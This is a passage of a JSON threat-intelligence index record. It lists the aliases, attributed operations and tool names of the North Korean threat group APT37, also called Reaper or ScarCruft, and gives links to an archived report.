Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434300, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/fa9c020074f0dafaa088c04e67d4bd164b598db7.pdf", "text": "https://archive.orkl.eu/fa9c020074f0dafaa088c04e67d4bd164b598db7.txt", "img": "https://archive.orkl.eu/fa9c020074f0dafaa088c04e67d4bd164b598db7.jpg" } }